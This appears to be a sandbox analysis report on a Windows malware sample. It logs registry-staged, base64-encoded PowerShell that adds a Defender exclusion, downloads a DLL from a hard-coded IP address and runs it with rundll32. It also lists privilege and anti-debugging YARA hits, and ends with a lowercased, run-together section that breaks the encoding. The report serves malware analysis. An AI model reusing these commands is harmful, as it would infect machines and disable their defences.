GwAbAAsAFIAUwAzADIAOwA= filepath: reg	1	1
ShellExecuteExW March 7, 2023, 9:58 a.m.	show_type: 0 filepath_r: reg parameters: add HKCU\SOFTWARE\SpinulososerrateHendecane /v insoucianceReptiles /d CMehXJuhGNWqofrszZJBgFTZWWtbsqabyvfrnONLCGBNEwJsUjlxUBnBhlxSQiQmDQlXsRNaWlOueEbMDtlMLnEJwfwYhfMhVMsSZpFnrXXkhLRUAxbKIGmulpCQKUXPWveXByzNBWpXQcMXaVJxSxFrmIIFjqXjMDnjtXeINBcuPQBZHOnavVjdnXcJeRsQCDbLIiTdyxcUHCtJLKjqbBUGWbtVvCZElpzOPMzqMwAJegkxhqXAcCTppAGLwqJycKpQlRMbfyjuODGCNBCJtxNbkHgnkEnMbOJgkEmnLWSikddXgBBBvZhUtxZholOCyVjbYaeiNKKlCyLCzwNhdFDjRDJVcAnSSdPtftBtnThbS filepath: reg	1	1
ShellExecuteExW March 7, 2023, 9:58 a.m.	show_type: 0 filepath_r: reg parameters: add HKCU\SOFTWARE\SpinulososerrateHendecane /v jivaro /d xmgGYAasmzRzvhBgZxPERTsCDGMgFMwYSOXlaRHLTwjMmIyXtzjckuSbSddSeZJsiHFAjuIaZbaNkFoSDAnSoxKINkRETskowDXLwQFuibrZKxFhqQFNkznHBzSwDpFacSTDnLVAufEzdRTaDQLIzVjstWkovLEChroVhTEACCcjEdazHuOyDvpXITrenUzzqEpsWlzDxhjKycYgvxnIGVObMdBkADbUUludHBVUaYKLoyQZWhmiYukuivFtbrLIenVSzVNRbgqFkckxMwtlMJAmpLSnGiipLPJkrBjzNnurfPVhwwLbZpDtvVrIriZVswIzcZtLwbqDzArZhkyfmJzkKAddTwTQdpljIhROfEJQkelmHdEKNZWmzOAVFRcfi filepath: reg	1	1
ShellExecuteExW March 7, 2023, 9:58 a.m.	show_type: 0 filepath_r: powershell parameters: $SpinulososerrateHendecane = Get-ItemProperty -Path HKCU:\SOFTWARE\SpinulososerrateHendecane \| %{$_.Wordcraftsman}; powershell -windowstyle Minimized -encodedcommand "JABVAG4AdwBhA$SpinulososerrateHendecane" filepath: powershell	1	1

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW March 7, 2023, 9:58 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW March 7, 2023, 9:58 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (44 events)

description	Escalate priviledges	rule	Escalate_priviledges
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Escalate priviledges	rule	Escalate_priviledges
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Escalate priviledges	rule	Escalate_priviledges
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Escalate priviledges	rule	Escalate_priviledges
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (8 events)

cmdline	"C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\SpinulososerrateHendecane /v Wordcraftsman /d HIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAGIAcgBvAG0AZQBsAGkAYQBjAGUAbwB1AHMAIAB8ACAAJQB7ACQAXwAuAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AfQA7ACAAJABVAG4AdwBhAHIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIAAiAEMAaQBsAGkAZQBsAGwAYQAiACAAKwAgACQAVQBuAHcAYQByAHAAZQBkAEkAcgBvAG4AdwBvAHIAawBlAHIAOwAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AGYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFUAbgB3AGEAcgBwAGUAZABJAHIAbwBuAHcAbwByAGsAZQByACkAKQA7ACAAWwBjAGwAYQBzAHMAaQBjAHkAYwAxAF0AOgA6AEUAeABlAGMAdQB0AGUAKAAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAeABlAGMAdQB0AGkAbwBuAHAAbwBsAGkAYwB5ACAAYgB5AHAAYQBzAHMAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAAIgAiAGAAJABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIABgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AYAApAC4ARAByAGkAdgBlAC4ATgBhAG0AZQAgACsAIAAnADoAXAAnADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlADsAcgBlAGcAIABkAGUAbABlAHQAZQAgAEgASwBFAFkAXwBDAFUAUgBSAEUATgBUAF8AVQBTAEUAUgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACAALwB2ACAAVQBzAGUAcgBpAG4AaQB0ACAALwBmADsAIAByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwAYgByAG8AbQBlAGwAaQBhAGMAZQBvAHUAcwAgAC8AdgAgAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AIAAvAGYAIgAiACIAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAGgAdAB0AHAAOgAvAC8AMQAzADQALgAyADAAOQAuADIAMQA2AC4AMQA2ADMALwBxAEkANAA2AG4AMQBOAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABvAHYAZQByAHYAYQB1AGwAdABVAG4AaABlAHIAbwBpAHoAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAbwB2AGUAcgB2AGEAdQBsAHQAVQBuAGgAZQByAG8AaQB6AGUALgBkAGwAbAAsAFIAUwAzADIAOwA=
cmdline	reg add HKCU\SOFTWARE\SpinulososerrateHendecane /v jivaro /d xmgGYAasmzRzvhBgZxPERTsCDGMgFMwYSOXlaRHLTwjMmIyXtzjckuSbSddSeZJsiHFAjuIaZbaNkFoSDAnSoxKINkRETskowDXLwQFuibrZKxFhqQFNkznHBzSwDpFacSTDnLVAufEzdRTaDQLIzVjstWkovLEChroVhTEACCcjEdazHuOyDvpXITrenUzzqEpsWlzDxhjKycYgvxnIGVObMdBkADbUUludHBVUaYKLoyQZWhmiYukuivFtbrLIenVSzVNRbgqFkckxMwtlMJAmpLSnGiipLPJkrBjzNnurfPVhwwLbZpDtvVrIriZVswIzcZtLwbqDzArZhkyfmJzkKAddTwTQdpljIhROfEJQkelmHdEKNZWmzOAVFRcfi
cmdline	reg add HKCU\SOFTWARE\bromeliaceous /v abulic /d kgmObQADIWevfLNAfnmOmDlagwAZOlxjSZdinjhaXLABefEwvtKeIgOWbRYjjnNLnPWBwSdswnqJVimKkYMKXkZLdwzLdIrSljrUPrNdxlACLpHRTMaOdMiyqLvFcKTufWdxxZsWUfHatHtakcMXApnEHGDSrMxktEJewtTTmxxcaHtnXvZEUoYzdZanJXFqmjbBcHHiQIDivZzgZnZQtyyuEMlucRACncNcpXbiAlFIVyRpIjdnIVSDZNkgtMPZOtdVWOWTEsEPJAXWzheuLnoDjhMgfYYDKPTsRSrQUkzbFvpubBHQcgTrTGYlTygfgbdGISAqsxBzaBVZJBdbxaDjJddFWzRVBtQnENJohQENBTZxkceaLaSwWNKTibOjWCWFCiTnmgbDocGPRtQIAroxcjocolsmVT
cmdline	"C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\SpinulososerrateHendecane /v jivaro /d xmgGYAasmzRzvhBgZxPERTsCDGMgFMwYSOXlaRHLTwjMmIyXtzjckuSbSddSeZJsiHFAjuIaZbaNkFoSDAnSoxKINkRETskowDXLwQFuibrZKxFhqQFNkznHBzSwDpFacSTDnLVAufEzdRTaDQLIzVjstWkovLEChroVhTEACCcjEdazHuOyDvpXITrenUzzqEpsWlzDxhjKycYgvxnIGVObMdBkADbUUludHBVUaYKLoyQZWhmiYukuivFtbrLIenVSzVNRbgqFkckxMwtlMJAmpLSnGiipLPJkrBjzNnurfPVhwwLbZpDtvVrIriZVswIzcZtLwbqDzArZhkyfmJzkKAddTwTQdpljIhROfEJQkelmHdEKNZWmzOAVFRcfi
cmdline	reg add HKCU\SOFTWARE\SpinulososerrateHendecane /v insoucianceReptiles /d CMehXJuhGNWqofrszZJBgFTZWWtbsqabyvfrnONLCGBNEwJsUjlxUBnBhlxSQiQmDQlXsRNaWlOueEbMDtlMLnEJwfwYhfMhVMsSZpFnrXXkhLRUAxbKIGmulpCQKUXPWveXByzNBWpXQcMXaVJxSxFrmIIFjqXjMDnjtXeINBcuPQBZHOnavVjdnXcJeRsQCDbLIiTdyxcUHCtJLKjqbBUGWbtVvCZElpzOPMzqMwAJegkxhqXAcCTppAGLwqJycKpQlRMbfyjuODGCNBCJtxNbkHgnkEnMbOJgkEmnLWSikddXgBBBvZhUtxZholOCyVjbYaeiNKKlCyLCzwNhdFDjRDJVcAnSSdPtftBtnThbS
cmdline	reg add HKCU\SOFTWARE\SpinulososerrateHendecane /v Wordcraftsman /d HIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAGIAcgBvAG0AZQBsAGkAYQBjAGUAbwB1AHMAIAB8ACAAJQB7ACQAXwAuAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AfQA7ACAAJABVAG4AdwBhAHIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIAAiAEMAaQBsAGkAZQBsAGwAYQAiACAAKwAgACQAVQBuAHcAYQByAHAAZQBkAEkAcgBvAG4AdwBvAHIAawBlAHIAOwAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AGYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFUAbgB3AGEAcgBwAGUAZABJAHIAbwBuAHcAbwByAGsAZQByACkAKQA7ACAAWwBjAGwAYQBzAHMAaQBjAHkAYwAxAF0AOgA6AEUAeABlAGMAdQB0AGUAKAAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAeABlAGMAdQB0AGkAbwBuAHAAbwBsAGkAYwB5ACAAYgB5AHAAYQBzAHMAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAAIgAiAGAAJABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIABgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AYAApAC4ARAByAGkAdgBlAC4ATgBhAG0AZQAgACsAIAAnADoAXAAnADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlADsAcgBlAGcAIABkAGUAbABlAHQAZQAgAEgASwBFAFkAXwBDAFUAUgBSAEUATgBUAF8AVQBTAEUAUgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACAALwB2ACAAVQBzAGUAcgBpAG4AaQB0ACAALwBmADsAIAByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwAYgByAG8AbQBlAGwAaQBhAGMAZQBvAHUAcwAgAC8AdgAgAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AIAAvAGYAIgAiACIAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAGgAdAB0AHAAOgAvAC8AMQAzADQALgAyADAAOQAuADIAMQA2AC4AMQA2ADMALwBxAEkANAA2AG4AMQBOAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABvAHYAZQByAHYAYQB1AGwAdABVAG4AaABlAHIAbwBpAHoAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAbwB2AGUAcgB2AGEAdQBsAHQAVQBuAGgAZQByAG8AaQB6AGUALgBkAGwAbAAsAFIAUwAzADIAOwA=
cmdline	"C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\SpinulososerrateHendecane /v insoucianceReptiles /d CMehXJuhGNWqofrszZJBgFTZWWtbsqabyvfrnONLCGBNEwJsUjlxUBnBhlxSQiQmDQlXsRNaWlOueEbMDtlMLnEJwfwYhfMhVMsSZpFnrXXkhLRUAxbKIGmulpCQKUXPWveXByzNBWpXQcMXaVJxSxFrmIIFjqXjMDnjtXeINBcuPQBZHOnavVjdnXcJeRsQCDbLIiTdyxcUHCtJLKjqbBUGWbtVvCZElpzOPMzqMwAJegkxhqXAcCTppAGLwqJycKpQlRMbfyjuODGCNBCJtxNbkHgnkEnMbOJgkEmnLWSikddXgBBBvZhUtxZholOCyVjbYaeiNKKlCyLCzwNhdFDjRDJVcAnSSdPtftBtnThbS
cmdline	"C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\bromeliaceous /v abulic /d kgmObQADIWevfLNAfnmOmDlagwAZOlxjSZdinjhaXLABefEwvtKeIgOWbRYjjnNLnPWBwSdswnqJVimKkYMKXkZLdwzLdIrSljrUPrNdxlACLpHRTMaOdMiyqLvFcKTufWdxxZsWUfHatHtakcMXApnEHGDSrMxktEJewtTTmxxcaHtnXvZEUoYzdZanJXFqmjbBcHHiQIDivZzgZnZQtyyuEMlucRACncNcpXbiAlFIVyRpIjdnIVSDZNkgtMPZOtdVWOWTEsEPJAXWzheuLnoDjhMgfYYDKPTsRSrQUkzbFvpubBHQcgTrTGYlTygfgbdGISAqsxBzaBVZJBdbxaDjJddFWzRVBtQnENJohQENBTZxkceaLaSwWNKTibOjWCWFCiTnmgbDocGPRtQIAroxcjocolsmVT

Powershell script adds registry entries (1 event)

cmd

"c:\windows\system32\reg.exe" add hkcu\software\spinulososerratehendecane /v wordcraftsman /d hiacablagqasqbyag8abgb3ag8acgbraguacgagad0aiabhaguadaataekadablag0auabyag8acablahiadab5acaalqbqageadaboacaasablaemavqa6afwaxabtae8argbuafcaqqbsaeuaxabcagiacgbvag0azqbsagkayqbjaguabwb1ahmaiab8acaajqb7acqaxwauafcabwbyagqaywbyageazgb0ahmabqbhag4afqa7acaajabvag4adwbhahiacablagqasqbyag8abgb3ag8acgbraguacgagad0aiaaiaemaaqbsagkazqbsagwayqaiacaakwagacqavqbuahcayqbyahaazqbkaekacgbvag4adwbvahiaawblahiaowagafsaugblagyabablagmadabpag8abgauaeeacwbzaguabqbiagwaeqbdadoaogbmag8ayqbkacgawwbdag8abgb2aguacgb0af0aoga6agyacgbvag0aqgbhahmazqa2adqauwb0ahiaaqbuagcakaakafuabgb3ageacgbwaguazabjahiabwbuahcabwbyagsazqbyackakqa7acaawwbjagwayqbzahmaaqbjahkaywaxaf0aoga6aeuaeablagmadqb0aguakaaiahaabwb3aguacgbzaggazqbsagwaiaataguaeablagmadqb0agkabwbuahaabwbsagkaywb5acaaygb5ahaayqbzahmaiaatahcaaqbuagqabwb3ahmadab5agwazqagaggaaqbkagqazqbuacaaigaiagaajabjahuacgbyaguabgb0aeqacgbpahyazqagad0aiabgacgazwblahqalqbsag8aywbhahqaaqbvag4ayaapac4arabyagkadgblac4atgbhag0azqagacsaiaanadoaxaanadsaiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaalqbfahgaywbsahuacwbpag8abgbqageadaboacaayaakagmadqbyahiazqbuahqarabyagkadgbladsacgblagcaiabkaguabablahqazqagaegaswbfafkaxwbdafuaugbsaeuatgbuaf8avqbtaeuaugbcafmatwbgafqavwbbafiarqbcae0aaqbjahiabwbzag8azgb0afwavwbpag4azabvahcacwbcaemadqbyahiazqbuahqavgblahiacwbpag8abgbcafiadqbuacaalwb2acaavqbzaguacgbpag4aaqb0acaalwbmadsaiabyaguazwagagqazqbsaguadablacaasablaeuawqbfaemavqbsafiarqboafqaxwbvafmarqbsafwauwbpaeyavabxaeeaugbfafwaygbyag8abqblagwaaqbhagmazqbvahuacwagac8adgagafcabwbyagqaywbyageazgb0ahmabqbhag4aiaavagyaigaiaciakqa7aekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagaggadab0ahaaogavac8amqazadqalgayadaaoqauadiamqa2ac4amqa2admalwbxaekanaa2ag4amqboac8amaazacaalqbpacaajablag4adga6afqarqbnafaaxabvahyazqbyahyayqb1agwadabvag4aaablahiabwbpahoazqauagqababsadsaiabyahuabgbkagwabaazadiaiaakaguabgb2adoavabfae0auabcafwabwb2aguacgb2ageadqbsahqavqbuaggazqbyag8aaqb6agualgbkagwabaasafiauwazadiaowa=reg add hkcu\software\spinulososerratehendecane /v jivaro /d xmggyaasmzrzvhbgzxpertscdgmgfmwysoxlarhltwjmmiyxtzjckusbsddsezjsihfajuiazbankfosdansoxkinkretskowdxlwqfuibrzkxfhqqfnkznhbzswdpfacstdnlvaufezdrtadqlizvjstwkovlechrovhteacccjedazhuoydvpxitrenuzzqepswlzdxhjkycygvxnigvobmdbkadbuuludhbvuaykloyqzwhmiyukuivftbrlienvszvnrbgqfkckxmwtlmjamplsngiiplpjkrbjznnurfpvhwwlbzpdtvvririzvswizcztlwbqdzarzhkyfmjzkkaddtwtqdpljihrofejqkelmhdeknzwmzoavfrcfireg add hkcu\software\bromeliaceous /v abulic /d kgmobqadiwevflnafnmomdlagwazolxjszdinjhaxlabefewvtkeigowbryjjnnlnpwbwsdswnqjvimkkymkxkzldwzldirsljruprndxlaclphrtmaodmiyqlvfcktufwdxxzswufhathtakcmxapnehgdsrmxktejewtttmxxcahtnxvzeuoyzdzanjxfqmjbbchhiqidivzzgznzqtyyuemlucracncncpxbialfivyrpijdnivsdznkgtmpzotdvwowtesepjaxwzheulnodjhmgfyydkptsrsrqukzbfvpubbhqcgtrtgyltygfgbdgisaqsxbzabvzjbdbxadjjddfwzrvbtqnenjohqenbtzxkcealaswwnktibojwcwfcitnmgbdocgprtqiaroxcjocolsmvt"c:\windows\system32\reg.exe" add hkcu\software\spinulososerratehendecane /v jivaro /d xmggyaasmzrzvhbgzxpertscdgmgfmwysoxlarhltwjmmiyxtzjckusbsddsezjsihfajuiazbankfosdansoxkinkretskowdxlwqfuibrzkxfhqqfnkznhbzswdpfacstdnlvaufezdrtadqlizvjstwkovlechrovhteacccjedazhuoydvpxitrenuzzqepswlzdxhjkycygvxnigvobmdbkadbuuludhbvuaykloyqzwhmiyukuivftbrlienvszvnrbgqfkckxmwtlmjamplsngiiplpjkrbjznnurfpvhwwlbzpdtvvririzvswizcztlwbqdzarzhkyfmjzkkaddtwtqdpljihrofejqkelmhdeknzwmzoavfrcfireg add hkcu\software\spinulososerratehendecane /v insouciancereptiles /d cmehxjuhgnwqofrszzjbgftzwwtbsqabyvfrnonlcgbnewjsujlxubnbhlxsqiqmdqlxsrnawloueebmdtlmlnejwfwyhfmhvmsszpfnrxxkhlruaxbkigmulpcqkuxpwvexbyznbwpxqcmxavjxsxfrmiifjqxjmdnjtxeinbcupqbzhonavvjdnxcjersqcdbliitdyxcuhctjlkjqbbugwbtvvczelpzopmzqmwajegkxhqxacctppaglwqjyckpqlrmbfyjuodgcnbcjtxnbkhgnkenmbojgkemnlwsikddxgbbbvzhutxzholocyvjbyaeinkklcylczwnhdfdjrdjvcanssdptftbtnthbsreg add hkcu\software\spinulososerratehendecane /v wordcraftsman /d hiacablagqasqbyag8abgb3ag8acgbraguacgagad0aiabhaguadaataekadablag0auabyag8acablahiadab5acaalqbqageadaboacaasablaemavqa6afwaxabtae8argbuafcaqqbsaeuaxabcagiacgbvag0azqbsagkayqbjaguabwb1ahmaiab8acaajqb7acqaxwauafcabwbyagqaywbyageazgb0ahmabqbhag4afqa7acaajabvag4adwbhahiacablagqasqbyag8abgb3ag8acgbraguacgagad0aiaaiaemaaqbsagkazqbsagwayqaiacaakwagacqavqbuahcayqbyahaazqbkaekacgbvag4adwbvahiaawblahiaowagafsaugblagyabablagmadabpag8abgauaeeacwbzaguabqbiagwaeqbdadoaogbmag8ayqbkacgawwbdag8abgb2aguacgb0af0aoga6agyacgbvag0aqgbhahmazqa2adqauwb0ahiaaqbuagcakaakafuabgb3ageacgbwaguazabjahiabwbuahcabwbyagsazqbyackakqa7acaawwbjagwayqbzahmaaqbjahkaywaxaf0aoga6aeuaeablagmadqb0aguakaaiahaabwb3aguacgbzaggazqbsagwaiaataguaeablagmadqb0agkabwbuahaabwbsagkaywb5acaaygb5ahaayqbzahmaiaatahcaaqbuagqabwb3ahmadab5agwazqagaggaaqbkagqazqbuacaaigaiagaajabjahuacgbyaguabgb0aeqacgbpahyazqagad0aiabgacgazwblahqalqbsag8aywbhahqaaqbvag4ayaapac4arabyagkadgblac4atgbhag0azqagacsaiaanadoaxaanadsaiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaalqbfahgaywbsahuacwbpag8abgbqageadaboacaayaakagmadqbyahiazqbuahqarabyagkadgbladsacgblagcaiabkaguabablahqazqagaegaswbfafkaxwbdafuaugbsaeuatgbuaf8avqbtaeuaugbcafmatwbgafqavwbbafiarqbcae0aaqbjahiabwbzag8azgb0afwavwbpag4azabvahcacwbcaemadqbyahiazqbuahqavgblahiacwbpag8abgbcafiadqbuacaalwb2acaavqbzaguacgbpag4aaqb0acaalwbmadsaiabyaguazwagagqazqbsaguadablacaasablaeuawqbfaemavqbsafiarqboafqaxwbvafmarqbsafwauwbpaeyavabxaeeaugbfafwaygbyag8abqblagwaaqbhagmazqbvahuacwagac8adgagafcabwbyagqaywbyageazgb0ahmabqbhag4aiaavagyaigaiaciakqa7aekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagaggadab0ahaaogavac8amqazadqalgayadaaoqauadiamqa2ac4amqa2admalwbxaekanaa2ag4amqboac8amaazacaalqbpacaajablag4adga6afqarqbnafaaxabvahyazqbyahyayqb1agwadabvag4aaablahiabwbpahoazqauagqababsadsaiabyahuabgbkagwabaazadiaiaakaguabgb2adoavabfae0auabcafwabwb2aguacgb2ageadqbsahqavqbuaggazqbyag8aaqb6agualgbkagwabaasafiauwazadiaowa="c:\windows\system32\rundll32.exe" c:\users\test22\appdata\local\temp\\overvaultunheroize.dll rs32"c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle minimized -encodedcommand jabvag4adwbhahiacablagqasqbyag8abgb3ag8acgbraguacgagad0aiabhaguadaataekadablag0auabyag8acablahiadab5acaalqbqageadaboacaasablaemavqa6afwaxabtae8argbuafcaqqbsaeuaxabcagiacgbvag0azqbsagkayqbjaguabwb1ahmaiab8acaajqb7acqaxwauafcabwbyagqaywbyageazgb0ahmabqbhag4afqa7acaajabvag4adwbhahiacablagqasqbyag8abgb3ag8acgbraguacgagad0aiaaiaemaaqbsagkazqbsagwayqaiacaakwagacqavqbuahcayqbyahaazqbkaekacgbvag4adwbvahiaawblahiaowagafsaugblagyabablagmadabpag8abgauaeeacwbzaguabqbiagwaeqbdadoaogbmag8ayqbkacgawwbdag8abgb2aguacgb0af0aoga6agyacgbvag0aqgbhahmazqa2adqauwb0ahiaaqbuagcakaakafuabgb3ageacgbwaguazabjahiabwbuahcabwbyagsazqbyackakqa7acaawwbjagwayqbzahmaaqbjahkaywaxaf0aoga6aeuaeablagmadqb0aguakaaiahaabwb3aguacgbzaggazqbsagwaiaataguaeablagmadqb0agkabwbuahaabwbsagkaywb5acaaygb5ahaayqbzahmaiaatahcaaqbuagqabwb3ahmadab5agwazqagaggaaqbkagqazqbuacaaigaiagaajabjahuacgbyaguabgb0aeqacgbpahyazqagad0aiabgacgazwblahqalqbsag8aywbhahqaaqbvag4ayaapac4arabyagkadgblac4atgbhag0azqagacsaiaanadoaxaanadsaiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaalqbfahgaywbsahuacwbpag8abgbqageadaboacaayaakagmadqbyahiazqbuahqarabyagkadgbladsacgblagcaiabkaguabablahqazqagaegaswbfafkaxwbdafuaugbsaeuatgbuaf8avqbtaeuaugbcafmatwbgafqavwbbafiarqbcae0aaqbjahiabwbzag8azgb0afwavwbpag4azabvahcacwbcaemadqbyahiazqbuahqavgblahiacwbpag8abgbcafiadqbuacaalwb2acaavqbzaguacgbpag4aaqb0acaalwbmadsaiabyaguazwagagqazqbsaguadablacaasablaeuawqbfaemavqbsafiarqboafqaxwbvafmarqbsafwauwbpaeyavabxaeeaugbfafwaygbyag8abqblagwaaqbhagmazqbvahuacwagac8adgagafcabwbyagqaywbyageazgb0ahmabqbhag4aiaavagyaigaiaciakqa7aekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagaggadab0ahaaogavac8amqazadqalgayadaaoqauadiamqa2ac4amqa2admalwbxaekanaa2ag4amqboac8amaazacaalqbpacaajablag4adga6afqarqbnafaaxabvahyazqbyahyayqb1agwadabvag4aaablahiabwbpahoazqauagqababsadsaiabyahuabgbkagwabaazadiaiaakaguabgb2adoavabfae0auabcafwabwb2aguacgb2ageadqbsahqavqbuaggazqbyag8aaqb6agualgbkagwabaasafiauwazadiaowa="c:\windows\system32\reg.exe" add hkcu\software\spinulososerratehendecane /v insouciancereptiles /d cmehxjuhgnwqofrszzjbgftzwwtbsqabyvfrnonlcgbnewjsujlxubnbhlxsqiqmdqlxsrnawloueebmdtlmlnejwfwyhfmhvmsszpfnrxxkhlruaxbkigmulpcqkuxpwvexbyznbwpxqcmxavjxsxfrmiifjqxjmdnjtxeinbcupqbzhonavvjdnxcjersqcdbliitdyxcuhctjlkjqbbugwbtvvczelpzopmzqmwajegkxhqxacctppaglwqjyckpqlrmbfyjuodgcnbcjtxnbkhgnkenmbojgkemnlwsikddxgbbbvzhutxzholocyvjbyaeinkklcylczwnhdfdjrdjvcanssdptftbtnthbs"c:\windows\system32\windowspowershell\v1.0\powershell.exe" $spinulososerratehendecane = get-itemproperty -path hkcu:\software\spinulososerratehendecane | %{$_.wordcraftsman}; powershell -windowstyle minimized -encodedcommand "jabvag4adwbha$spinulososerratehendecane""c:\windows\system32\reg.exe" add hkcu\software\bromeliaceous /v abulic /d kgmobqadiwevflnafnmomdlagwazolxjszdinjhaxlabefewvtkeigowbryjjnnlnpwbwsdswnqjvimkkymkxkzldwzldirsljruprndxlaclphrtmaodmiyqlvfcktufwdxxzswufhathtakcmxapnehgdsrmxktejewtttmxxcahtnxvzeuoyzdzanjxfqmjbbchhiqidivzzgznzqtyyuemlucracncncpxbialfivyrpijdnivsdznkgtmpzotdvwowtesepjaxwzheulnodjhmgfyydkptsrsrqukzbfvpubbhqcgtrtgyltygfgbdgisaqsxbzabvzjbdbxadjjddfwzrvbtqnenjohqenbtzxkcealaswwnktibojwcwfcitnmgbdocgprtqiaroxcjocolsmvtpowershell $spinulososerratehendecane = get-itemproperty -path hkcu:\software\spinulososerratehendecane | %{$_.wordcraftsman}; powershell -windowstyle minimized -encodedcommand 